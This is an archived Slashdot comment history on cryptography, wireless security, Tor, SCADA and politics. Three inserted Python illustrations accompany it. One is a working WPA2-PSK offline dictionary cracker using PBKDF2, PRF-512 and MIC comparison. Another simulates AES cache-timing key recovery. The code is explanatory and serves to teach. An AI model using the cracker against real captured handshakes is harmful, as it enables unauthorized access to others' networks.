Slashdot Mirror


User: PureFiction

PureFiction's activity in the archive.

Stories
0
Comments
620

Comments · 620

  1. Re:Meta review on Are the NIST Standard Elliptic Curves Back-doored? · · Score: 1

    What is concerning are the twice-refuted efforts to have RDRAND bypass the Linux kernel pool mixing entirely, and the design decisions which intentionally make RDRAND an inscrutable black box that is trivial for a VMM to intercept and modify. These are not accidents.

    While there is no harm in using RDRAND to complement entropy on a system, by no measure should it be used as the sole source of entropy in a system.
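
The "complement, never sole source" position above, as an added illustration that is not code from the comment or from the kernel: a toy pool (hypothetical, not the kernel's implementation) folds every input through a hash, so a hardware RNG that a VMM has replaced with a stream it can replay adds nothing the attacker can exploit, whereas using that same instruction as the only source hands the attacker every output byte. The `CompromisedRdrand` stream, the `os.urandom` stand-in for timing entropy, and all names here are constructed for the example.

```python
import hashlib
import os


def _h(*parts: bytes) -> bytes:
    """SHA-256 over the concatenation of the given byte strings."""
    return hashlib.sha256(b"".join(parts)).digest()


class EntropyPool:
    """Toy pool (hypothetical, not the kernel's code): every input is folded in
    through a hash, so a weak or attacker-controlled source can add entropy
    but cannot cancel what the other sources contributed."""

    def __init__(self) -> None:
        self.state = bytes(32)
        self.counter = 0

    def mix(self, data: bytes, source: bytes) -> None:
        # Tag with the source name so identical bytes from two sources mix differently.
        self.state = _h(b"mix", self.state, source, len(data).to_bytes(4, "big"), data)

    def extract(self, n: int, hwrng=None) -> bytes:
        # A hardware RNG, if present, is just one more hash input at extraction time.
        hw = hwrng(32) if hwrng is not None else b""
        seed = _h(b"extract", self.state, self.counter.to_bytes(8, "big"), hw)
        self.state = _h(b"ratchet", seed)  # forward secrecy: old outputs not recoverable from new state
        self.counter += 1
        out = b""
        block = 0
        while len(out) < n:
            out += _h(b"expand", seed, block.to_bytes(4, "big"))
            block += 1
        return out[:n]


class CompromisedRdrand:
    """Constructed stand-in for an RDRAND that a VMM or firmware has replaced with a
    stream it can reproduce; the attacker knows every byte it will return."""

    def __init__(self) -> None:
        self.n = 0

    def __call__(self, nbytes: int) -> bytes:
        out = b""
        while len(out) < nbytes:
            out += _h(b"vmm-controlled", self.n.to_bytes(8, "big"))
            self.n += 1
        return out[:nbytes]


def sole_source(rdrand, n: int) -> bytes:
    """The 'bypass the pool' design: the instruction's output *is* the random output."""
    return rdrand(n)


def attacker_predicts(output: bytes, n: int) -> bool:
    """The attacker replays the stream it controls and checks whether that alone equals the output."""
    return CompromisedRdrand()(n) == output


def demo(n: int = 32):
    """Returns (attacker predicts sole-source output, attacker predicts mixed output)."""
    sole = sole_source(CompromisedRdrand(), n)
    pool = EntropyPool()
    # Entropy the attacker never saw; os.urandom stands in for interrupt timing and the like.
    pool.mix(os.urandom(32), b"irq-timing")
    mixed = pool.extract(n, hwrng=CompromisedRdrand())
    return attacker_predicts(sole, n), attacker_predicts(mixed, n)
```

`demo()` returns `(True, False)`: the replayed stream matches the sole-source output byte for byte and never matches the mixed output. The design choice worth noting is that the hardware input enters through the hash rather than being XORed onto the finished output, so a source that can see the other inputs still cannot cancel them.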

  2. Re:To the MODS on Will Donglegate Affect Your Decision To Attend PyCon? · · Score: 1

    I tried to mod your comment +"insightful"; alas, I'm out of points...

  3. Only If I'm Feeling Lucky... on Will Donglegate Affect Your Decision To Attend PyCon? · · Score: 1

    the stars must align for a clusterfsck this big:

    1) polemic agitator in attendance, in propinquity
    2) opportunistic exploitation of overheard conversation occurs, twitter shaming to ten thousand
    3) polemic agitator doubles down with histrionic blog post when twitter shame draws doubts and disapproval (this would be a crime in the EU)
    4) overly sensitive, over reactive start-up employer over compensates with firing, leading to social media furor, fanning flames
    5) classy apology asking for less nuclear resolutions ignites the firestorm, critical mass achieved
    6) juvenile hordes exact retribution on employer's servers, DDoS'ing to oblivion until terms met
    7) capitulation to vigilantes in a sea of misunderstanding drives media to madness

  4. Re:Backdoors Will be Used on CCTV Hack Takes Casino For $33 Million · · Score: 2

    "Are you really honestly claiming that, based on this one rare and isolated incident, that casinos all do good to improve their overall security by getting rid of their cameras?"

    No, but the "security tools" they apply should also be considered as sources of risk in the overall risk management equation. Too often security products get a pass because, well, they're security products.

    The Witty worm is another favorite example of this position of privilege turned against you.

  5. Good Test Engineer == Dev/QA Toolsmith Automator on What Does a Software Tester's Job Constitute? · · Score: 1

    Your development background will be very useful in a QA / Test Engineer role, assuming you are considering joining a technically competent organization.

    I say this because many companies have an antiquated view of "testers" as low-skilled keyboard jockeys able to bang keys and input fields like monkeys on Ritalin. Avoid these places like the plague...

    A premium QA/Test Engineer will apply development and other solid technical skills to:

    - Provision test systems spanning a wide variety of operating systems, network configurations, applications and settings; in short, be able to build everything you need to test the systems tasked to you.

    - Obtain a deeper understanding of the system under test; able to dig into code to discern logical errors and oversights, triage down to root cause and even suggest a fix/patch.

    - Integrate test automation technologies into the software process so regression and performance testing is part of a continuous integration & test lifecycle. Manual testing should only be a part of your efforts, as software systems continually expand in scope and a manual-only test process will eventually be overwhelmed by progress.

    - Extend and apply third party tools, ranging from code performance analyzers to network traffic capture/replay, code coverage analysis and unit test frameworks, fuzzers and chaos monkeys, etc.

    - Understand security risks and defensive coding techniques to identify deficiencies in a code base or implementation/design which introduce vulnerabilities. Catching these defects before a product goes live is very rewarding and can be exceptionally cost effective.

    - Develop internal tools or customize existing software using Shell, Perl, Python, Ruby, Java, C/C++, and other languages as required or appropriate for the task at hand.

    - Communicate effectively with multiple stakeholders in an organization: development, product support, marketing, administration, operations. These will all be interfacing with you, and the ability to tailor the technical depth and nomenclature of your written and oral communications to each of these groups is critical to being an effective QA/Test Engineer.

    And many other skills and capabilities I've not listed, depending on the context of your role in the group and the domain of the organization you work for.

    Many people still consider QA a less important or prestigious occupation compared to other technical professions, like software development. While the prestige may be lacking, the job satisfaction of a competent QA/Test Engineer who applies development, operations, and security analysis skills to improve a product is significant.

    The list of varied resources you should incorporate into your tester toolbox is too long to give here. Many sites exist devoted to QA toolsmith / test automation / security analysis roles, and you're going to want some skills and tools from all of these specialties at your disposal.

    Good luck! I hope you consider the switch; the world needs more competent QA/Test Engineers.

  6. Re:Oh yes, software on America's Future Is In Software, Not Hardware · · Score: 1

    Just wait until we have matter compilers.

    Except where I come from, we call them "ribosomes".

    Yes; but knowing how to program those matter compilers, ... GOTO 10

  7. Re:That's how money works - a shared hallucination on The Bitcoin Strikes Back · · Score: 1

    "Any medium of exchange is just as much a shared hallucination as bitcoin..."

    commodity based you can at least barter with or consume; in general you are correct and we agree.

    they all have trade-offs. i'll take decentralized, secure (potentially anonymous) Bitcoin and fend off the hackers while others pay banking intermediaries high fees for transactions performed at their leisure, presumably with less risk.

    to each their own... ;)

  8. Re:That's how money works - a shared hallucination on The Bitcoin Strikes Back · · Score: 4, Interesting

    "It has value because we pretend it does."

    absolutely true!

    fiat currencies are just as much a shared hallucination as bitcoin.

    at least bitcoins may provide more privacy...

  9. SCADA and Security are not yet integrated on Evaluating Or Testing Utility SCADA Security? · · Score: 3, Insightful

    SCADA systems are not designed, implemented, or operated with network and application level security concerns in mind.
    (Usually. The exceptions know who they are :)

    Your compensating control is physical security to limit access to SCADA elements and programming. It costs more, but you have no sane alternative.

    And before you get too cocky about that restricted air gap, consider Stuxnet turning such a strength into a weakness for exploit. At some point SCADA systems will be security conscious; that day is not today...

  10. Re:knowledge of the law on How Tor Helps Both Dissidents and the Police · · Score: 4, Informative

    "... there's no way in hell you could EVER know what the entire body of law"

    This is where jury nullification comes in. But they don't like that much either!

  11. Tor is Easy via Transparent Proxy on The Drawbacks of Anonymous Surfing · · Score: 3, Informative

    You can make Tor very easy to use with any application (on Windows or any other VMware/OpenVPN supported OS) with JanusVM:
    http://januswifi.dyndns.org:85/

    When you start the Windows VPN connection to the VMware virtual machine, that PPTP network becomes your default route. All DNS lookups, http requests, and other TCP traffic is now transparently routed through Tor. Simply disconnect the VPN to terminate anonymous onion routing...

    Also see the user documentation: http://januswifi.dyndns.org:85/Instructions.htm

    Transparent proxy avoids many common problems with explicit SOCKS configuration and DNS leaks. Worth a look...

  12. Re:Why the confusion? on Hacker-Built PC Scans 300 Wifi Networks At Once · · Score: 1

    i don't know who suggested/queued the original article intro posted by Zonk. i am involved on the software side and posted the anonymous corrections (prior to recovering this long idle acct) since neither Kyle nor myself were contacted prior to publication to verify technical details in content as evidenced by the couple of mis-quoted or mis-interpreted points above.

    or perhaps this is all an elaborate ruse designed to make you think in that direction... ;)

  13. Re:Cool...but huh? on Hacker-Built PC Scans 300 Wifi Networks At Once · · Score: 1

    See the clarification post. The passphrase is used to decrypt disk keys for loop-aes which contain more than 2000 bits of entropy. (23400 bits / 2925 bytes across 65 key lines to be precise. see the loop-aes readme for more detail)

  14. Re:Some corrections on Hacker-Built PC Scans 300 Wifi Networks At Once · · Score: 1

    Do we have to worry about the device falling into the wrong hands?

    Accidental sterilization due to prolonged RF absorption is a serious problem. Also, a bottle of Excedrin helps keep the microwave headaches at bay...

    [but seriously, use a properly keyed VPN over wireless and you're in good shape against any attacker.]

  15. Re:Some corrections on Hacker-Built PC Scans 300 Wifi Networks At Once · · Score: 1

    Anonymous Coward AKA Kyle Williams

    guess again... :)

  16. Re:will they add crypto? on Intel Plans to Overhaul Chip Architecture · · Score: 1

    If crypto is implemented in software, you can (relatively) easily fix bugs; if it's done in hardware, then every bug found means you're basically screwed.

    you better not screw up a block cipher implementation. that is the point. FIPS certification is a good clue you got it right.

    That being said, the attacks described are *not* remotely exploitable per se, and they can easily be worked around by not using hyperthreading, anyway, so they're really a tempest in a teapot.

    • "This paper reports successful extraction of a complete AES key from a network server on another computer. The targeted server used its key solely to encrypt data using the OpenSSL AES implementation on a Pentium III.

      The successful attack was a very simple timing attack. Presumably the same technique can extract complete AES keys from the more complicated servers actually used to handle Internet data, although the attacks will often require extra timings to average out the effects of variable network delays."

    cr.yp.to/antiforgery/cachetiming-20050414.pdf
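
The attack in the quoted paper correlates per-plaintext-byte timing averages against candidate key bytes. The following is an added simulation, not code from the comment or from the paper, of that first-round leak: the cache-line costs, key, noise model and sample count are all constructed, and the "server" is a local Python function rather than a network host, so it demonstrates only the statistical recovery step. The caveat it makes visible: with 16 four-byte T-table entries per 64-byte line, a first-round leak at line granularity pins down only the high nibble of each key byte; recovering the rest needs leakage finer than a cache line or later rounds, which this model does not include.

```python
import random
from math import sqrt

LINE_SHIFT = 4  # 64-byte lines / 4-byte T-table entries = 16 entries per line, so line = index >> 4

# Constructed cache state: lines 2, 7 and 11 of the table are "evicted" and cost extra.
# A real attacker gets this profile from a reference run against a server with a known key.
LINE_COST = [40.0 if line in (2, 7, 11) else 10.0 for line in range(16)]


def first_round_time(key: bytes, pt: bytes, rng: random.Random) -> float:
    """Leak model: each first-round lookup T[pt[i] ^ key[i]] costs its cache line's access time."""
    t = sum(LINE_COST[(pt[i] ^ key[i]) >> LINE_SHIFT] for i in range(16))
    return t + rng.gauss(0.0, 5.0)  # measurement noise (network jitter in the real attack)


def collect(key: bytes, n: int, rng: random.Random):
    """Attacker sends n random plaintexts and records the timing of each."""
    samples = []
    for _ in range(n):
        pt = bytes(rng.getrandbits(8) for _ in range(16))
        samples.append((pt, first_round_time(key, pt, rng)))
    return samples


def per_byte_means(samples):
    """mean[i][v]: average timing over samples whose plaintext byte i equals v."""
    sums = [[0.0] * 256 for _ in range(16)]
    cnt = [[0] * 256 for _ in range(16)]
    for pt, t in samples:
        for i, v in enumerate(pt):
            sums[i][v] += t
            cnt[i][v] += 1
    return [[sums[i][v] / cnt[i][v] if cnt[i][v] else 0.0 for v in range(256)] for i in range(16)]


def pearson(a, b) -> float:
    n = len(a)
    ma, mb = sum(a) / n, sum(b) / n
    cov = sum((x - ma) * (y - mb) for x, y in zip(a, b))
    va = sum((x - ma) ** 2 for x in a)
    vb = sum((y - mb) ** 2 for y in b)
    return cov / sqrt(va * vb) if va and vb else 0.0


def recover_high_nibbles(samples):
    """For each key byte, choose the high nibble whose predicted line pattern best matches
    the measured per-value timings. The low nibble selects an entry *within* a line and
    leaves the timing unchanged, so it is invisible to this model."""
    means = per_byte_means(samples)
    recovered = []
    for i in range(16):
        scores = []
        for hn in range(16):
            predicted = [LINE_COST[(v >> LINE_SHIFT) ^ hn] for v in range(256)]
            scores.append((pearson(means[i], predicted), hn))
        recovered.append(max(scores)[1])
    return recovered


def run_attack(n_samples: int = 20000, seed: int = 1):
    """Returns (true high nibbles of the key, high nibbles recovered from timings only)."""
    rng = random.Random(seed)
    key = bytes(rng.getrandbits(8) for _ in range(16))
    samples = collect(key, n_samples, rng)
    return [k >> LINE_SHIFT for k in key], recover_high_nibbles(samples)
```

`run_attack()` returns two equal lists: 64 bits of the key fall out of 20000 timings with nothing but averaging and correlation, which is why "not remotely exploitable" deserves the qualifier the paper's own abstract gives it (more timings to average out network delay, not a different technique).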
  17. will they add crypto? on Intel Plans to Overhaul Chip Architecture · · Score: 1

  18. strong security over wireless is possible on On The Current State of WiFi Security · · Score: 2, Insightful

    IPsec: SHA-256 AH, AES-128 ESP

    We set up such a configuration at DEFCON and despite various attacks against both AP and client, including evil twin, WDS exploits, traffic replay, etc., the network was absolutely impenetrable.

    The only secure configuration I would consider would be WPA2 with RADIUS authentication. Pre-shared key is vulnerable to dictionary attacks so be sure to key with a good random string if you use this mode.
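
As an added illustration (not the commenter's configuration and not code from any named project), the following Python shows why a pre-shared key falls to dictionary attacks: the PMK is PBKDF2-HMAC-SHA1(passphrase, SSID), and the EAPOL-Key MIC from a captured 4-way handshake lets an attacker test candidate passphrases offline, one PBKDF2 run each. The handshake below is constructed (fixed MACs, nonces and a placeholder EAPOL body), as is the wordlist; the PRF-512 and MIC formulas follow IEEE 802.11i, and `strong_psk` produces the kind of random passphrase the comment recommends.

```python
import hashlib
import hmac
import secrets
from typing import Optional


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes) per IEEE 802.11i."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: concatenate HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || data || i) for i = 0..3."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]  # KCK = bytes 0..15, KEK = 16..31, TK = 32..47


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP key MIC: HMAC-SHA1 over the EAPOL-Key frame (MIC field zeroed), truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack(handshake: dict, wordlist) -> Optional[str]:
    """Offline dictionary attack: derive PMK -> KCK for each candidate and compare the MIC."""
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:  # WPA passphrase length limits
            continue
        kck = ptk(wpa2_pmk(cand, handshake["ssid"]), handshake["ap"], handshake["sta"],
                  handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return cand
    return None


def strong_psk() -> str:
    """63 printable ASCII characters (the WPA passphrase maximum) from the OS CSPRNG: 47 bytes, ~376 bits."""
    return secrets.token_urlsafe(47)


def make_handshake(passphrase: str, ssid: str = "corpnet") -> dict:
    """Constructed capture standing in for a sniffed 4-way handshake (message 2 carries the MIC)."""
    ap, sta = bytes.fromhex("02aa11bb22cc"), bytes.fromhex("0211dd33ee44")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    # Placeholder EAPOL-Key body with the MIC field already zeroed, as a cracker would prepare it.
    eapol = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(32) + snonce + bytes(40)
    kck = ptk(wpa2_pmk(passphrase, ssid), ap, sta, anonce, snonce)[:16]
    return {"ssid": ssid, "ap": ap, "sta": sta, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "mic": eapol_mic(kck, eapol)}


# Constructed wordlist; real ones run to hundreds of millions of entries.
WORDLIST = ["password", "12345678", "letmein1", "password123", "corpnet2013"]
```

`crack(make_handshake("password123"), WORDLIST)` returns `"password123"` after five PBKDF2 runs; `crack(make_handshake(strong_psk()), WORDLIST)` returns `None`, and no wordlist helps against a 376-bit passphrase. The 4096-iteration PBKDF2 slows each guess but does not change the arithmetic: PSK strength is passphrase strength, which is the point of the comment's advice.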

  19. Explanation: on Hackers, Spelling, and Grammar? · · Score: 1

    It baffles me that a culture so obsessed with technical knowledge and accuracy can demonstrate such little attention to detail when it comes to communicating that knowledge with others.

    Human languages for person-person communication have a fair amount of redundancy to ensure reliable transmission. you "undrstnd wha im sying?"

    languages designed for human-computer / computer-computer conversation are much less forgiving. flip a bit and the meaning is inverted! :)

  20. Re:Hackers = Canaries in the Coal Mine on Inventor of Proxy Firewall Blames Hackers · · Score: 1

    you continue with ad hominem attacks and other logical fallacies and i'm not sure why; why do you insist on putting words in my mouth? to clarify:

    They were spouting about unalienable rights at the same time many of them owned slaves who had none of these rights.

    of course this is an ideal, just like anything else. the only true "right" as you seem intent on defining the term is the right to die. I don't agree with their interpretation (as slave owners, who did not respect these rights for all people, colored or female or otherwise) but i believe in the concept: that certain freedoms _should_ be granted to all persons, male, female, black, white, etc. it is this selective freedom based on other criteria (for example, men have more freedoms than women in islamic society) that I am opposed to.

    Let me harken back to something you said earlier, child porn is bad. So obviously after all this gushing idealism you are advocating that child porn be freely and abundantly available, and you are going to do your part to make sure that it's readily available to all because you simply can't try to control the bits on the Internet.

    of course not, and the purpose of law enforcement is to pursue these crimes through other mechanisms (there was child porn before digital networks and there will be ever after. they locate victims and track perpetrators; do you see the difference here?). if you want to control every bit on the networks you would make encryption illegal (as it makes traffic opaque) and you would need to have everyone access the net with secure nymity, lest they did something wrong and could not be identified. that is totalitarianism and a severe blow against the freedom to communicate.

    The Downing Street Memo comes out now and it makes zero difference other than reiterating something most people with a clue already knew

    and how did you know it? that is my point. anyone with clue can see the flaws in current media coverage and that is where other media sources come into play. the fact that they are growing more popular and credible (and thus influencing mainstream media) shows that it is useful, and that when media does choose to report it some Justice Department Gulag doesn't come down and censor them.

  21. Re:bad research, too on Bram Cohen's Response to Microsoft's Avalanche · · Score: 1

    C'mon, pay attention: flash crowds can happen in either clustered or heterogeneous networks. you can do central coding in both, though the results vary widely based on network topology.

    i think we're splitting hairs here. what were we talking about? :)

  22. Re:bad research, too on Bram Cohen's Response to Microsoft's Avalanche · · Score: 1

    Specifically, they get a 40% improvement over central coding and a 200% improvement over unencoded transfers.

    read it again. they get 200% improvement over central coding in a clustered environment. they get 300% improvement over no coding in a clustered environment.

    for heterogeneous networks it's a much more conservative 20% better than central coding, 30% better than no coding.

    and for flash crowds in heterogeneous networks it's 40% better than central coding, 200% better than no coding.

    until someone actually builds one in the real world, that remains fiction, too.

    absolutely; there are strong indicators that CPU/memory overhead associated with this type of network coding will make it less effective in practice. only a real world deployment on actual end user hardware will tell us...

  23. Re:Hackers = Canaries in the Coal Mine on Inventor of Proxy Firewall Blames Hackers · · Score: 1

    That is just silly. You are never going to identify them, and you have no legal basis to compel them in to treatment.

    that is the point; it is a problem they must identify as a problem and seek treatment (if it is available - that is the issue - making treatment available). i won't digress further into this; you need to understand the concept of liberty and the fact that you cannot regulate or enforce constraints on personal behavior that do not affect anyone else. to do so is the root of invasive forms of authoritarianism which is far worse than someone looking at too much porn.

    you can't control bits over networks, to do so leads to a great big brother firewall where everything must be seen and inspected by the government / enforcement authority. that is an affront to liberty of every kind. you do not understand the concept of freedom to communicate if you think you can selectively control access to purely digital information.

    Bottomline is you do want to inflict your culture and your values on the rest of the world

    unalienable rights are not "culture inflicted" on the world. to go back to the slavery analogy, would you call abolition of slavery "inflicting culture" across the world? if so, we have nothing more to discuss. i am diametrically opposed to assaults against essential liberties that should be given to all men and women, regardless of culture.

    If you are a big fan of freedom of speech maybe you should start by defending it at home.

    please don't patronize me unknowingly. i do support these freedoms; it is a major part of how i spend my time, both implementing, deploying and improving anonymous networking systems, independent media, resource discovery, etc.

    Fact is the Bush administration and Republicans are launching a full frontal assault on it

    absolutely; they have done more to undermine essential liberties than anyone else in recent memory. i am actively and continually working to thwart their efforts.

    As for "freedom of the press" the fact is the press in the U.S. has turned completely pathetic. No they aren't censored by the government, instead they are censored by advertisers, and their corporate head office and their ratings.

    very true, which is why i spend so much time promoting and assisting with development of independent media channels. these have made a difference, for example the downing street memo would never have broken into US media were it not for independent media here pushing it forward. progress can be made, it is just difficult and slow.

    The war in Iraq proved beyond a shadow of a doubt our press is more government cheerleader than anything and there is virtually no watchdog left in it.

    this is true for the mainstream press/media, but freedom of speech means that our independent media can operate without government approval or interference. it may not have the infrastructure or resources but it is making a difference.

    Yet dictatorships with overt suppression of speech and freedom are bad, but I think you are really kidding yourself to think there is really free speech or free press in this country either, the means for controlling it are just somewhat more subtle than a jack boot and a billy club.

    you need to understand the concept of free speech: it is not that mainstream media needs to be more truthful, it is that independent media can exist without government approval (and even under severe disapproval) and yet continue to exist. sometimes our mainstream media will step up to the bar and fulfill a useful purpose - watergate perhaps. but more often than not it will be the independent channels unbiased by advertisers or government influence who relay authentic newsworthy information.

  24. Re:Hackers = Canaries in the Coal Mine on Inventor of Proxy Firewall Blames Hackers · · Score: 1

    From that predisposition its been established by the powers that be that Islamic cultures must be westernized to be acceptable and in the process they seek to make them no longer Islamic.

    this is not about westernization, it is about basic freedoms. women should be free to work, free to educate themselves, free to not be publicly stoned to death for having sex out of marriage.

    if such freedoms "destroy islamic culture", which they would not, then it doesn't matter. slavery used to be culturally acceptable but that doesn't matter: it violated basic human freedoms and needed to be abolished regardless.

    in their never ending obsession to find more and better porn to squander their life staring at instead of doing something productive and worthwhile.

    this is called addiction, and just like drug addiction or other addictions it is best resolved through treatment and rehabilitation. not incarceration, not prohibition, none of that works well and often causes more harm than good.

    you seem inclined to want an authoritarian government to control vices without understanding the dark roads that such intent leads to.

    After having lived in America for a while I guess maybe I've reached the point that I'm not sure there are many people left here who do have an "ethical sense" whether they be religious or not. I imagine greed is a nearly universal trait, but somehow America in particular has turned it into a cultural priority.

    this is a huge problem and one that is overlooked. there are many of us americans who are trying to change that; to paint greed as a vice and not a virtue, to emphasize the benefits of cooperation instead of competition. you need to separate the notion of western corporate culture from western social progress.

    i'm all for westernization of the east if that means western concepts of women's equality, deprecation of authoritarianism and patriarchy. i'm completely against westernization in the form of psychopathic corporate business practices.

    there is a lot more to be done here as well; the religious conservatives in this country are hell bent on establishing authoritarian controls on moral code which is detestable and must be opposed.

    women are still subjected to various types of discrimination and sexual assault / rape at far too frequent levels.

    i too would hate to see the world homogenized in to an American culture; i don't think it is likely to happen.

    i would very much like to see certain aspects of american freedom homogenized across the world, like women's rights, freedom of speech and the press, etc.

  25. Re:bad research, too on Bram Cohen's Response to Microsoft's Avalanche · · Score: 1

    network coding performs better than transmitting unencoded blocks, or using techniques that are based on erasure codes, which can be thought of as coding but only at the server.

    this is exactly the big improvement they talk about. the flash crowd problem is one of the main problems they are trying to tackle with network coding and they anticipate a 40-200% improvement over central coding or unencoded transfer.

    i agree that these results are speculation; but the paper clearly describes the superiority of network coding over erasure/online codes performed centrally as far as their model / simulations are concerned.